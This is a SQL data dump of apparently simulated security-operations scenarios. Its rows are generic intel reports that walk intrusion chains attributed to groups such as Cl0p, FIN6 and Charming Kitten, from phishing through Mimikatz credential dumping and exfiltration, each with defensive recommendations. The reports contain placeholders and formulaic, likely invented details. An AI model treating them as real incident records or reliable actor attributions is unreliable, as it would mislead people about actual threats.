(131, 24, 418, 1, 'Insight into Initial Access through Phishing', '### Overview\nThe phishing email detected in the initial alert utilized a well-crafted spear-phishing technique targeting employees with access to critical systems.\n\n### Details\n- **Sender:** masqueraded as a trusted vendor.\n- **Subject Line:** \"Urgent Invoice Request\"\n- **Payload:** Attachment containing a malicious macro.\n\n### Recommendations\n- Conduct an organization-wide phishing awareness training.\n- Implement an email filtering system to detect and quarantine suspicious emails.\n\n### Next Steps\nMonitor for any execution of malware associated with this phishing attempt.', '2026-01-04 04:13:57'),
(132, 24, 419, 2, 'Analysis of Malware Execution', '### Overview\nFollowing the phishing incident, malware execution was detected on the targeted employee\'s workstation.\n\n### Details\n- **Type of Malware:** Cobalt Strike\n- **Execution Method:** Macro within Excel document\n- **Impact:** Established a command and control (C2) channel.\n\n### Recommendations\n- Isolate the affected workstation immediately.\n- Deploy endpoint detection and response (EDR) solutions to prevent further spread.\n\n### Next Steps\nInvestigate persistence mechanisms that may have been employed by the malware.', '2026-01-04 04:13:57'),
(133, 24, 420, 3, 'Detection of Persistence Mechanisms', '### Overview\nThe malware has established persistence to survive system reboots and maintain access.\n\n### Details\n- **Persistence Technique:** Registry run keys\n- **Additional Observations:** Scheduled tasks were also modified.\n\n### Recommendations\n- Review and clean registry entries.\n- Analyze scheduled tasks for unauthorized modifications.\n\n### Next Steps\nMonitor for unusual administrative access that may indicate lateral movement within the network.', '2026-01-04 04:13:57'),
(134, 24, 421, 4, 'Unauthorized Admin Access Detected', '### Overview\nAnomalous administrative access was detected, indicating potential lateral movement by the threat actor.\n\n### Details\n- **Account Compromised:** Admin account \"sysadmin\"\n- **Access Point:** Remote desktop protocol (RDP)\n- **Time of Access:** 03:45 AM\n\n### Recommendations\n- Immediately reset credentials for all admin accounts.\n- Implement multi-factor authentication (MFA) for critical accounts.\n\n### Next Steps\nInvestigate and monitor for any signs of data exfiltration attempts.', '2026-01-04 04:13:57'),
(135, 24, 422, 5, NULL, NULL, '2026-01-04 04:13:57'),
(136, 25, 423, 1, 'Phishing Email Analysis', '### Initial Findings\n\nThe phishing email detected contained a malicious attachment disguised as an invoice. The email was sent from a seemingly legitimate domain but upon further inspection, the domain was registered only days prior to the attack. The email header analysis revealed multiple red flags including mismatched sender information and a peculiar routing path through compromised servers.\n\n### Next Steps\n\n1. **Immediate Action:** Isolate the user account that received and interacted with the email.\n2. **Investigation:** Conduct a deeper analysis of the attachment to determine the specific exploit used.\n3. **Preparation:** Anticipate potential execution attempts via scripts and monitor PowerShell activity closely.', '2026-01-04 04:25:30'),
(137, 25, 424, 2, 'PowerShell Script Execution Insights', '### Script Analysis\n\nThe suspicious PowerShell script executed on the compromised endpoint was obfuscated to evade detection. The script attempted to download additional payloads from a remote server using encoded commands. This behavior is consistent with the initial stages of malware deployment.\n\n### Mitigation Steps\n\n1. **Isolation:** Disconnect the affected machine from the network immediately.\n2. **Forensic Analysis:** Capture a memory dump for further investigation.\n3. **Monitoring:** Enhance monitoring on PowerShell logs and network traffic to detect other possible execution attempts.\n\n### Preparing for Persistence\n\nBe vigilant for signs of persistence mechanisms, such as unusual changes in registry keys or scheduled tasks.', '2026-01-04 04:25:33'),
(138, 25, 425, 3, 'Persistence Mechanism Investigation', '### Observations\n\nPersistence was established through registry modifications and the creation of hidden scheduled tasks. Additionally, the malware created a startup entry to ensure execution upon system reboot.\n\n### Countermeasures\n\n1. **Registry Audit:** Conduct a full audit of recent registry changes, focusing on keys related to startup programs.\n2. **Scheduled Task Review:** Identify and remove unauthorized tasks.\n3. **User Education:** Reinforce training on recognizing and reporting phishing attempts.\n\n### Preparing for Lateral Movement\n\nMonitor RDP connections and unusual authentication attempts across the network.', '2026-01-04 04:25:33'),
(139, 25, 426, 4, 'Lateral Movement and Exfiltration Threat Analysis', '### Lateral Movement Detection\n\nThe adversary utilized Remote Desktop Protocol (RDP) to move laterally within the network. This was facilitated by previously compromised credentials.\n\n### Immediate Actions\n\n1. **Credential Review:** Reset passwords for all affected accounts and enforce MFA.\n2. **RDP Restrictions:** Limit RDP access to only essential personnel and monitor for unauthorized attempts.\n\n### Preparing for Data Exfiltration\n\nAs exfiltration is likely the next stage, enhance monitoring of outbound network traffic and inspect large data transfers for legitimacy. Employ DLP solutions to prevent unauthorized data transfers.', '2026-01-04 04:25:33'),
(140, 25, 427, 5, NULL, NULL, '2026-01-04 04:25:33'),
(141, 26, 428, 1, 'Analysis of Initial Access Vector', '### Overview\nAfter detecting the spear phishing email, our analysis has identified key elements within the email structure that are consistent with Cl0p\'s tactics. The email contained a seemingly legitimate attachment designed to deceive the recipient into executing it.\n\n### Email Characteristics\n- **Sender Address:** Spoofed domain closely resembling a known partner.\n- **Subject Line:** Urgent action required to avoid account suspension.\n- **Attachment:** A compressed file containing a malicious script.\n\n### Next Steps\nThe focus will now shift to monitoring potential execution vectors, particularly any script execution resulting from this phishing attempt.', '2026-01-04 04:38:04'),
(142, 26, 429, 2, 'Malicious Script Execution Confirmed', '### Overview\nA malicious script linked to the previously detected spear phishing email was executed on the target system. This script has been identified as a custom PowerShell script, a common tool in Cl0p\'s arsenal.\n\n### Script Analysis\n- **Payload:** The script downloads and executes additional payloads.\n- **Obfuscation Techniques:** Heavy use of string obfuscation to evade detection.\n- **Target System Impact:** Initial dropper for further malware deployment.\n\n### Next Steps\nOur priority is to determine how the attacker is establishing persistence. Monitoring registry changes and other system modifications will be critical.', '2026-01-04 04:38:04'),
(143, 26, 430, 3, 'Persistence Mechanism Detected', '### Overview\nPersistence has been established via registry modification, a tactic often utilized by Cl0p to maintain access to compromised systems.\n\n### Details of Modification\n- **Registry Key Altered:** HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n- **Malware Executable:** Set to launch a secondary payload on system startup.\n\n### Implications\nThis persistence method suggests a long-term intent to maintain control over the system.\n\n### Next Steps\nFocus will now be on detecting lateral movement attempts, particularly through credential dumping activities that may follow.', '2026-01-04 04:38:04'),
(144, 26, 431, 4, 'Credential Dumping Detected', '### Overview\nCredential dumping activity has been identified, indicating an attempt to escalate privileges and move laterally within the network.\n\n### Tools and Techniques\n- **Tool Utilized:** Mimikatz, a known tool for credential extraction.\n- **Target:** Local Security Authority Subsystem Service (LSASS) process.\n\n### Security Implications\nCompromised credentials could allow access to critical systems and sensitive data.\n\n### Next Steps\nImmediate attention is required to monitor for data exfiltration attempts, especially through encrypted channels, a known Cl0p tactic.', '2026-01-04 04:38:04'),
(145, 26, 432, 5, NULL, NULL, '2026-01-04 04:38:04'),
(146, 27, 433, 1, 'Analysis of Suspicious Login Attempts', '## Context:\nFollowing the detection of suspicious login attempts indicating potential password spraying, further analysis is required to determine the risk level and potential targets.\n\n### Summary:\n- **Targets Identified:** Diplomatic personnel accounts.\n- **IP Patterns:** Multiple IP addresses originating from known threat landscapes.\n- **Recommendations:**\n  - Implement multi-factor authentication (MFA).\n  - Increase monitoring on login attempts from suspicious IPs.\n  - Educate users on recognizing phishing attempts.\n\n### Next Steps:\nMonitoring should continue to detect any unusual token usage, potentially indicating token theft.', '2026-01-04 23:55:22'),
(147, 27, 434, 2, 'Unusual Token Usage Analysis', '## Context:\nFollowing the detection of unusual token usage patterns, this report delves deeper into potential token theft activities.\n\n### Summary:\n- **Token Characteristics:**\n  - Tokens used outside of normal geographic locations.\n  - Access requests for sensitive diplomatic documents.\n- **Attack Vector:** Possible exploitation of application vulnerabilities.\n- **Mitigation Measures:**\n  - Revoke compromised tokens.\n  - Reset affected accounts.\n  - Strengthen token issuance policies.\n\n### Next Steps:\nVigilance is required for any unauthorized OAuth applications that may be created, leveraging stolen tokens.', '2026-01-04 23:55:22'),
(148, 27, 435, 3, 'Unauthorized OAuth Application Creation Alert', '## Context:\nDetection of unauthorized OAuth applications suggests potential abuse aimed at gaining persistent access to sensitive resources.\n\n### Summary:\n- **Applications Identified:** Several OAuth applications mimicking legitimate services.\n- **Impacted Resources:** Access to email, cloud storage, and internal communication tools.\n- **Countermeasures:**\n  - Immediate removal of unauthorized applications.\n  - Conduct a thorough review of existing OAuth permissions.\n  - Tighten OAuth application approval processes.\n\n### Next Steps:\nMonitor for signs of lateral movement within the cloud environment to preempt further exploitation.', '2026-01-04 23:55:22'),
(149, 27, 436, 4, 'Lateral Movement and Cloud Exploitation Insights', '## Context:\nDetection of lateral movement within the cloud environment indicates potential exploitation following OAuth abuse.\n\n### Summary:\n- **Patterns Observed:**\n  - Access to multiple cloud services using compromised identities.\n  - Unusual escalation of privileges within cloud platforms.\n- **Threat Actors:** Likely linked to known APT groups targeting diplomatic entities.\n- **Defensive Actions:**\n  - Audit and restrict permissions on sensitive resources.\n  - Employ behavior analytics to detect anomalies.\n\n### Next Steps:\nRemain vigilant for any signs of data exfiltration, which may be the next phase of the attack.', '2026-01-04 23:55:22'),
(150, 27, 437, 5, NULL, NULL, '2026-01-04 23:55:22'),
(151, 28, 438, 1, 'Analysis of PowerShell Execution Patterns', '### Context\nFollowing the detection of unusual PowerShell execution, a detailed analysis was conducted to understand the patterns and motives behind this activity.\n\n### Findings\n- **Command Execution**: The PowerShell script was executed with obfuscated commands, suggesting an attempt to evade detection.\n- **Objective**: Initial analysis indicates the possibility of reconnaissance activities, potentially setting up for persistence mechanisms.\n\n### Recommendations\n- **Monitoring**: Enhance logging of PowerShell activities and implement real-time alerts for suspicious command patterns.\n- **Mitigation**: Implement PowerShell script block logging and transcription to capture detailed execution data.\n\n### Next Steps\nPrepare for potential persistence mechanisms, as suggested by the nature of the PowerShell activity. Stay vigilant for suspicious WMI activity.', '2026-01-04 23:57:10'),
(152, 28, 439, 2, 'Investigation into Suspicious WMI Activity', '### Context\nPost detection of suspicious WMI activity, an investigation was launched to determine the scope and impact of this persistence strategy.\n\n### Findings\n- **WMI Usage**: The attacker leveraged WMI to establish persistence, likely by creating event subscriptions to execute malicious scripts upon specific triggers.\n- **Scope**: This activity is consistent with tactics used by Volt Typhoon, indicating a sophisticated threat actor.\n\n### Recommendations\n- **Hardening**: Disable unnecessary WMI services and restrict access to only authorized personnel.\n- **Detection**: Employ advanced monitoring to detect new WMI event subscriptions or alterations to existing ones.\n\n### Next Steps\nPrepare for potential lateral movement, as WMI activity often precedes such actions. Monitor for changes in network configurations or unusual remote access attempts.', '2026-01-04 23:57:10'),
(153, 28, 440, 3, 'Security Implications of Anomalous netsh Configuration', '### Context\nAnomalous changes in netsh configuration were observed, indicating potential lateral movement efforts by the threat actor.\n\n### Findings\n- **Configuration Changes**: The attacker appears to have modified firewall rules and network configurations to facilitate lateral movement within the infrastructure.\n- **Intent**: Such changes are typically employed to bypass network security controls or to establish covert communication channels.\n\n### Recommendations\n- **Review**: Conduct a comprehensive review of all recent netsh configuration changes and validate against security policies.\n- **Prevention**: Implement strict access controls and regular audits on network configuration tools.\n\n### Next Steps\nMonitor for unusual remote desktop protocol (RDP) sessions, which may be utilized for further lateral movement across the network.', '2026-01-04 23:57:10'),
(154, 28, 441, 4, 'Detection of Unusual RDP Sessions', '### Context\nThe detection of unexpected RDP sessions suggests an ongoing lateral movement effort by the attacker within the network.\n\n### Findings\n- **RDP Activity**: Multiple unauthorized RDP sessions were initiated, likely to access sensitive systems and further compromise the infrastructure.\n- **Patterns**: The sessions were conducted using compromised credentials, indicating the threat actor\'s success in credential theft.\n\n### Recommendations\n- **Access Controls**: Enhance RDP access controls and enforce multi-factor authentication for remote access.\n- **Surveillance**: Implement continuous monitoring of RDP sessions and alert on any deviations from normal patterns.\n\n### Next Steps\nRemain alert for potential exfiltration attempts, as attackers may leverage newly gained access to exfiltrate data through encrypted channels.', '2026-01-04 23:57:10'),
(155, 28, 442, 5, NULL, NULL, '2026-01-04 23:57:10'),
(156, 29, 443, 1, 'Analysis of Phishing Email Tactics', '## Overview\nThe phishing email detected appears to be part of a coordinated campaign by Charming Kitten, targeting journalists. The email contains a malicious link disguised as a legitimate news article.\n\n## Detailed Analysis\n- **Sender Details**: The email masquerades as coming from a known media organization, using a spoofed domain closely resembling the legitimate one.\n- **Content**: The email body uses urgent language to entice the recipient to click on the link, promising exclusive content.\n\n## Recommendations\n- **User Awareness**: Encourage recipients to verify the sender\'s email address.\n- **Security Measures**: Implement email filtering and flagging for known malicious domains.\n\n## Next Steps\nPrepare for potential follow-up attacks through other communication channels such as WhatsApp.', '2026-01-04 23:59:37'),
(157, 29, 444, 2, 'Malicious WhatsApp Message Dissection', '## Overview\nFollowing the phishing email, a malicious WhatsApp message was detected, indicating a multi-channel social engineering approach by Charming Kitten.\n\n## Detailed Analysis\n- **Message Content**: The message contains a shortened URL leading to a website hosting the DownPaper backdoor.\n- **Social Engineering Aspect**: The message pretends to be a continuation of the email conversation, increasing credibility.\n\n## Recommendations\n- **User Training**: Advise targets to verify unexpected messages, particularly those with links.\n- **Technical Measures**: Enhance monitoring on communication apps for known malicious URLs.\n\n## Next Steps\nAnticipate potential malware execution if the DownPaper payload is delivered successfully.', '2026-01-04 23:59:37'),
(158, 29, 445, 3, 'DownPaper Backdoor Execution Analysis', '## Overview\nThe DownPaper backdoor has been executed on a system, confirming the delivery method was successful through the malicious WhatsApp message.\n\n## Detailed Analysis\n- **Payload Functionality**: The backdoor establishes a connection to a command and control server, allowing remote access.\n- **Indicators of Compromise**: Look for unusual network traffic and processes related to DownPaper.\n\n## Recommendations\n- **Immediate Action**: Isolate the affected system to prevent further compromise.\n- **Detection Enhancement**: Update endpoint protection to identify DownPaper signatures.\n\n## Next Steps\nMonitor for lateral movement attempts within the network.', '2026-01-04 23:59:37'),
(159, 29, 446, 4, 'Lateral Movement and Data Exfiltration Readiness', '## Overview\nAfter executing the DownPaper backdoor, attempts to move laterally across the network have been detected.\n\n## Detailed Analysis\n- **Movement Techniques**: The attackers are exploiting known vulnerabilities in network protocols to move between systems.\n- **Target Identification**: Critical systems and databases appear to be the focus of these movements.\n\n## Recommendations\n- **Network Segmentation**: Implement stricter segmentation to limit lateral movement.\n- **Patch Management**: Ensure all systems are up-to-date with the latest security patches.\n\n## Next Steps\nPrepare for possible data exfiltration attempts by monitoring outgoing traffic for anomalies.', '2026-01-04 23:59:37'),
(160, 29, 447, 5, NULL, NULL, '2026-01-04 23:59:37'),
(161, 30, 448, 1, 'Initial Access Analysis: VPN Anomaly', '### VPN Login Anomaly\n\nAfter the detection of a suspicious VPN login from an unusual location, further investigation revealed that the credentials used were valid, suggesting potential credential compromise. The login originated from an IP address associated with known malicious activity. Analysts are advised to monitor for any further signs of unauthorized access.\n\n#### Recommendations\n- Immediately reset compromised credentials.\n- Implement geo-restriction policies on VPN access.\n- Increase logging and monitoring on VPN devices.', '2026-01-05 00:02:38');
INSERT INTO `operation_alerts` (`id`, `operation_id`, `alert_id`, `sequence_order`, `intel_report_title`, `intel_report_content`, `created_at`) VALUES
(162, 30, 449, 2, 'Execution Tactics: Web Shell Deployment', '### Web Shell Detected on VPN Device\n\nA web shell has been detected on the compromised VPN device, indicating execution of potentially malicious code. The web shell allows remote execution of commands and could be used to further infiltrate the network.\n\n#### Recommendations\n- Isolate impacted VPN devices immediately.\n- Conduct a thorough inspection for additional web shells.\n- Patch any vulnerabilities in the VPN firmware.', '2026-01-05 00:02:38'),
(163, 30, 450, 3, 'Lateral Movement Insights: Network Traffic Anomalies', '### Unusual Network Traffic Patterns\n\nPost web shell deployment, there has been unusual network traffic from the VPN device to multiple internal servers. This traffic suggests lateral movement attempts within the network, potentially targeting critical systems or domain controllers.\n\n#### Recommendations\n- Capture and analyze network traffic logs.\n- Deploy network segmentation to limit lateral movement.\n- Increase IDS/IPS sensitivity to detect anomalous traffic.', '2026-01-05 00:02:38'),
(164, 30, 451, 4, 'Persistence Analysis: Domain Controller Access Attempt', '### Unauthorized Domain Controller Access\n\nAn unauthorized access attempt was detected on the domain controller, suggesting efforts to establish persistence. The attacker likely seeks to maintain long-term access to the network.\n\n#### Recommendations\n- Audit domain controller access logs for anomalies.\n- Implement two-factor authentication for sensitive systems.\n- Regularly review and harden domain controller configurations.', '2026-01-05 00:02:38'),
(165, 30, 452, 5, 'Credential Harvesting: Mimikatz Activity', '### Mimikatz Detected on Domain Controller\n\nMimikatz, a tool used for credential harvesting, was detected running on the domain controller. This indicates that the attacker is attempting to extract credentials to escalate privileges and expand access.\n\n#### Recommendations\n- Revoke and reset compromised credentials immediately.\n- Implement endpoint detection and response solutions.\n- Conduct a full security audit of domain controller systems.', '2026-01-05 00:02:38'),
(166, 30, 453, 6, 'Exfiltration Alert: Data Movement from Domain Controller', '### Data Exfiltration Detected\n\nSignificant data exfiltration activity has been detected from the domain controller. This suggests that sensitive information has been compromised and potentially transferred outside the network.\n\n#### Recommendations\n- Identify and secure the data exfiltration point.\n- Implement data loss prevention tools.\n- Notify relevant stakeholders and legal entities as per compliance requirements.', '2026-01-05 00:02:38'),
(167, 30, 454, 7, NULL, NULL, '2026-01-05 00:02:38'),
(168, 32, 455, 1, 'Post-Compromise Analysis: Third-Party Library Breach', '### Overview\nThe initial alert identified a compromise via a third-party library, suggesting a supply chain attack. This indicates a breach at the level of software dependencies, commonly exploited by Magecart groups.\n\n### Technical Details\n- **Vulnerable Library**: The breach originated from a popular JavaScript library commonly used for e-commerce platforms.\n- **Attack Vector**: The attackers injected malicious code into the library before distribution, affecting all sites utilizing the compromised version.\n\n### Recommendations\n- **Immediate Actions**: Remove the compromised library version from your systems and monitor for any unusual activity.\n- **Long-term Strategy**: Implement a robust dependency tracking system and regularly audit third-party code for vulnerabilities.\n\n### Next Steps\nPrepare for potential **Code Injection** activities, as malicious scripts are likely to be executed on compromised websites.', '2026-01-05 00:07:01'),
(169, 32, 456, 2, 'Execution of Obfuscated JavaScript: Code Injection Analysis', '### Overview\nFollowing the supply chain compromise, obfuscated JavaScript has been detected executing within the affected websites. This is a classic Magecart tactic aimed at capturing sensitive user data.\n\n### Technical Details\n- **Obfuscation Method**: The JavaScript code uses advanced obfuscation techniques to avoid detection by standard security tools.\n- **Functionality**: The script is designed to skim credit card information entered on checkout pages and store it temporarily before exfiltration.\n\n### Recommendations\n- **Immediate Actions**: Deploy advanced threat detection tools capable of de-obfuscating and analyzing JavaScript code in real-time.\n- **Mitigation Strategy**: Harden your Content Security Policy (CSP) to restrict unauthorized script execution.\n\n### Next Steps\nPrepare for **Data Exfiltration** as the attackers will attempt to transfer skimmed data to their drop servers. Monitor outgoing network traffic for anomalies.', '2026-01-05 00:07:01'),
(170, 32, 457, 3, NULL, NULL, '2026-01-05 00:07:01'),
(171, 33, 458, 1, 'Initial Access Analysis: Vendor Login Anomaly', '## Investigation Summary\nThe suspicious vendor login detected indicates potential unauthorized access to the retail network. The login was traced back to an IP address known for previous cyber activities linked to the FIN6 group.\n\n## Incident Details\n- **Date & Time**: [Timestamp]\n- **Source IP**: [Suspicious IP Address]\n- **Affected System**: Vendor portal\n\n## Recommendations\n- Immediately review access logs for the vendor portal.\n- Implement multi-factor authentication for vendor accounts.\n- Conduct a security audit of all vendor credentials.\n\n## Next Steps\nPrepare for potential escalation of activities, such as malware deployment, given historical patterns of FIN6 operations.', '2026-01-05 00:10:13'),
(172, 33, 459, 2, 'Trinity Malware Deployment on POS Systems', '## Incident Overview\nFollowing the initial access, Trinity malware has been deployed across multiple POS systems. This malware is engineered to scrape sensitive credit card data.\n\n## Key Indicators\n- **Malware Signature**: Trinity (v2.5)\n- **Affected Systems**: POS terminals at multiple retail locations\n- **Detection Method**: Anomalous network traffic and unusual process activity\n\n## Containment Measures\n- Isolate affected POS systems from the network.\n- Begin forensic imaging of compromised systems for deeper analysis.\n\n## Next Steps\nFocus on understanding the method of persistence that the attackers may employ to maintain access within the network.', '2026-01-05 00:10:13'),
(173, 33, 460, 3, 'Persistence Mechanisms: Ensuring Long-term Access', '## Persistence Tactics\nFollowing the Trinity malware deployment, evidence suggests the attackers are establishing persistence mechanisms to secure long-term access.\n\n## Observations\n- **Backdoor Installations**: Detected across several POS systems.\n- **Registry Alterations**: Unusual changes consistent with persistence techniques.\n- **Scheduled Tasks**: Newly created tasks that execute malicious scripts.\n\n## Recommendations\n- Perform a comprehensive review of system startup entries and scheduled tasks.\n- Remove unauthorized backdoors and restore registry settings to default.\n\n## Next Steps\nMonitor for lateral movement attempts as attackers may seek to expand their foothold within the network.', '2026-01-05 00:10:13'),
(174, 33, 461, 4, 'Lateral Movement Detected: Expanding Attack Surface', '## Movement Patterns\nUnauthorized lateral movement has been detected, suggesting an expansion of the attack surface by FIN6 operatives.\n\n## Indicators of Compromise\n- **Credential Harvesting**: Attempts to access additional systems using compromised credentials.\n- **Network Scanning**: Scans targeting lateral movement pathways.\n- **Unauthorized Access**: Attempts to access HR and financial systems.\n\n## Containment Strategies\n- Implement network segmentation to restrict unauthorized access.\n- Reset credentials for all potentially compromised accounts.\n\n## Next Steps\nPrepare for potential data exfiltration attempts, focusing particularly on sensitive financial data.', '2026-01-05 00:10:13'),
(175, 33, 462, 5, NULL, NULL, '2026-01-05 00:10:13'),
(176, 34, 463, 1, 'Execution of Embedded VBScript Backdoor Uncovered', '### Overview\nFollowing the initial access achieved through a weaponized Word document, further investigation has revealed the execution of an embedded VBScript backdoor. This backdoor is activated as soon as the document is opened by the target, exploiting vulnerabilities in VBScript execution.\n\n### Technical Details\nThe VBScript is designed to run in the background, establishing persistent access to the compromised system. It leverages Windows Management Instrumentation (WMI) to execute commands and maintain a foothold.\n\n### Indicators of Compromise (IOCs)\n- Unusual network traffic originating from the affected host.\n- Creation of scheduled tasks or registry entries linked to VBScript execution.\n\n### Recommendations\n- Implement strict email filtering to block potentially malicious attachments.\n- Educate personnel on recognizing phishing attempts and suspicious document behaviors.', '2026-01-05 02:59:34'),
(177, 34, 464, 2, 'Data Exfiltration via Encrypted Channels Identified', '### Overview\nThe previously identified VBScript backdoor has facilitated data exfiltration activities. Our analysis indicates that sensitive information is being transmitted through encrypted channels, making detection more challenging.\n\n### Technical Details\nThe data exfiltration process involves packaging sensitive files into encrypted archives, which are then transmitted to remote servers controlled by the threat actors. The use of HTTPS and other encrypted protocols obscures the content from standard monitoring tools.\n\n### Indicators of Compromise (IOCs)\n- Outbound connections to unfamiliar IP addresses using HTTPS.\n- Unusual data transfer volumes at odd hours.\n\n### Recommendations\n- Deploy network anomaly detection systems to identify unusual patterns in encrypted traffic.\n- Conduct regular audits of data access and transfer logs to spot unauthorized activities.\n- Strengthen endpoint security measures to detect and block unauthorized encryption tools.', '2026-01-05 02:59:34'),
(178, 34, 465, 3, NULL, NULL, '2026-01-05 02:59:34'),
(179, 35, 466, 1, 'Insight into Initial Access: Trojanized Software Update', '### Contextual Analysis\n\nFollowing the detection of the **trojanized software update**, our investigation reveals that the compromise occurred through a sophisticated supply chain attack. The malicious update originates from a compromised vendor responsible for developing ICS software used widely in the energy sector.\n\n### Key Observations:\n- **Vendor Breach**: Initial analysis suggests that the vendor\'s software distribution infrastructure was breached approximately 3 months ago.\n- **Malware Characteristics**: The trojanized update includes a payload designed to install a Remote Access Trojan (RAT) known as \'Havex\'.\n\n### Next Steps:\n- **Monitor for RAT Deployment**: Be vigilant for signs of \'Havex\' RAT installation and execution across affected systems.\n- **Vendor Communication**: Engage with the software vendor to confirm breach details and remediation plans.', '2026-01-05 03:02:42'),
(180, 35, 467, 2, 'Execution of \'Havex\' RAT: Command and Control Infrastructure', '### Incident Overview\n\nPost-deployment of the **\'Havex\' RAT**, communication with its command and control (C2) servers has been observed. This RAT allows adversaries remote control over infected machines, enabling further reconnaissance and exploitation.\n\n### Key Indicators:\n- **C2 Domains**: Infected systems connect to multiple C2 domains, some of which have been newly registered and others linked to known threat actor infrastructure.\n- **RAT Capabilities**: The \'Havex\' RAT is capable of gathering system information, executing commands, and facilitating lateral movement.\n\n### Actionable Intelligence:\n- **Registry Monitoring**: Prepare to detect persistence mechanisms, particularly involving registry modifications.\n- **Network Segmentation**: Implement stricter network segmentation to limit RAT communication and lateral movement.', '2026-01-05 03:02:42'),
(181, 35, 468, 3, 'Persistence Mechanism: Registry Modifications Detected', '### Persistence Analysis\n\nThe adversary has employed **registry modifications** to ensure the \'Havex\' RAT remains active. This persistence mechanism involves altering system configurations to execute the RAT upon system startup.\n\n### Technical Details:\n- **Registry Keys Altered**: Modifications have been observed in key areas responsible for startup execution, specifically within `HKEY_LOCAL_MACHINE` and `HKEY_CURRENT_USER` paths.\n- **Stealth Tactics**: The changes are subtle, designed to evade typical detection methods by mimicking legitimate entries.\n\n### Recommendations:\n- **Conduct Integrity Checks**: Regularly verify registry integrity against known good baselines.\n- **Prepare for Lateral Movement**: Anticipate network reconnaissance activities, specifically anomalies in SMB traffic.', '2026-01-05 03:02:42'),
(182, 35, 469, 4, 'Lateral Movement: SMB Traffic Anomaly and Network Reconnaissance', '### Network Activity Review\n\nUnusual **SMB traffic patterns** indicate ongoing **lateral movement** and reconnaissance activities. This phase involves mapping the network to identify high-value targets for data exfiltration.\n\n### Traffic Analysis:\n- **Suspicious Connections**: Multiple SMB connections initiated from compromised hosts targeting administrative shares.\n- **Reconnaissance Tools**: Use of known tools such as `PsExec` and `WMIC` to explore network topology and access additional systems.\n\n### Defensive Measures:\n- **Anomaly Detection**: Enhance monitoring for unusual SMB traffic and lateral movement activities.\n- **Data Exfiltration Monitoring**: Prepare to intercept unauthorized data transfers, particularly those involving sensitive operational data.', '2026-01-05 03:02:42'),
(183, 35, 470, 5, NULL, NULL, '2026-01-05 03:02:42'),
(184, 36, 471, 1, 'Unsigned Software Update Detected', '## Overview\nFollowing the detection of suspicious Wi-Fi network activity, a potential threat has been identified involving an unsigned software update. This update appears to be disguised as a legitimate system or application update targeting luxury hotel executives.\n\n## Details\n- **Type of Threat:** Tapaoux malware\n- **Method of Delivery:** Wi-Fi network masquerading as a trusted access point\n- **Target:** Executives of luxury hotels\n\n## Recommendations\n- **Network Monitoring:** Enhance monitoring of Wi-Fi networks for unauthorized access points.\n- **Software Verification:** Ensure all updates are signed and verified before installation.\n\n## Next Steps\nInvestigate the execution phase to determine if the malware has been successfully deployed onto target systems.', '2026-01-05 03:04:49'),
(185, 36, 472, 2, 'Tapaoux Malware Persistence Mechanism', '## Overview\nAfter identifying the unsigned software update, further investigation reveals the Tapaoux malware has established persistence mechanisms in the target systems.\n\n## Details\n- **Persistence Techniques:** The malware modifies startup scripts and registry keys to ensure it executes upon system reboot.\n- **Stealth Tactics:** It employs obfuscation techniques to evade detection by traditional antivirus solutions.\n\n## Recommendations\n- **System Hardening:** Regularly review and limit startup scripts and registry changes.\n- **Advanced Threat Protection:** Deploy solutions capable of detecting obfuscated code.\n\n## Next Steps\nExamine potential unauthorized credential access attempts as the malware may be moving laterally within the network.', '2026-01-05 03:04:49'),
(186, 36, 473, 3, 'Unauthorized Credential Access Attempt', '## Overview\nFollowing the establishment of persistence by Tapaoux malware, there have been attempts to access credentials within the compromised systems.\n\n## Details\n- **Credential Harvesting:** The malware attempts to extract cached credentials from browsers and network authentication processes.\n- **Potential Targets:** Emails, financial applications, and internal corporate networks.\n\n## Recommendations\n- **Credential Management:** Enforce multi-factor authentication and regular credential updates.\n- **Incident Response:** Conduct a thorough review of access logs to identify any anomalies.\n\n## Next Steps\nMonitor for potential exfiltration of sensitive data, which could indicate further stages of the attack.', '2026-01-05 03:04:49'),
(187, 36, 474, 4, 'Exfiltration of Sensitive Data', '## Overview\nAs anticipated, there is evidence of data exfiltration following the unauthorized credential access attempts. Sensitive information has been transferred out of the network.\n\n## Details\n- **Data Types:** Financial records, personal information of executives, and proprietary business data.\n- **Exfiltration Channels:** Utilization of encrypted channels and cloud services to circumvent detection.\n\n## Recommendations\n- **Data Loss Prevention:** Implement solutions to monitor and block unauthorized data transfers.\n- **Forensic Analysis:** Conduct a comprehensive forensic analysis to understand the scale and impact of the data breach.\n\n## Next Steps\nInitiate containment procedures to prevent further data loss and begin remediation efforts to secure the network.', '2026-01-05 03:04:49'),
(188, 36, 475, 5, NULL, NULL, '2026-01-05 03:04:49'),
(189, 37, 476, 1, 'Analysis of Malicious Payload Execution via RoyalRoad Exploit', '### Overview\nFollowing the detection of a suspicious email containing a malicious RTF attachment, further investigation reveals the exploitation of the RoyalRoad vulnerability. The RoyalRoad exploit has been utilized to execute a malicious payload on the target system.\n\n### Technical Details\n- **Exploit Method**: The RTF attachment leverages a known vulnerability in Microsoft Office to execute arbitrary code.\n- **Payload**: The payload includes scripts that prepare the environment for further exploitation.\n\n### Implications\nThe successful execution of this payload indicates a sophisticated attack vector likely aiming to establish deeper system access.\n\n### Next Steps\n- Monitor for any signs of persistence mechanisms being established.\n- Conduct a detailed forensic analysis of the affected systems.', '2026-01-05 03:08:29'),
(190, 37, 477, 2, 'Persistence Mechanism via Aria-body Backdoor', '### Overview\nFollowing the execution of the RoyalRoad exploit, analysis identifies the installation of the Aria-body backdoor. This backdoor is designed to maintain persistent access to the compromised systems.\n\n### Technical Details\n- **Backdoor Functionality**: The Aria-body backdoor allows the attacker to maintain a foothold in the network and execute commands remotely.\n- **Persistence Method**: The backdoor is embedded within legitimate system processes, making detection challenging.\n\n### Implications\nEstablishing persistence is a critical step for the attacker to facilitate further actions, including lateral movement.\n\n### Recommendations\n- Implement enhanced monitoring for unusual network activities.\n- Initiate a comprehensive review of system logs to identify any signs of lateral movement.', '2026-01-05 03:08:29'),
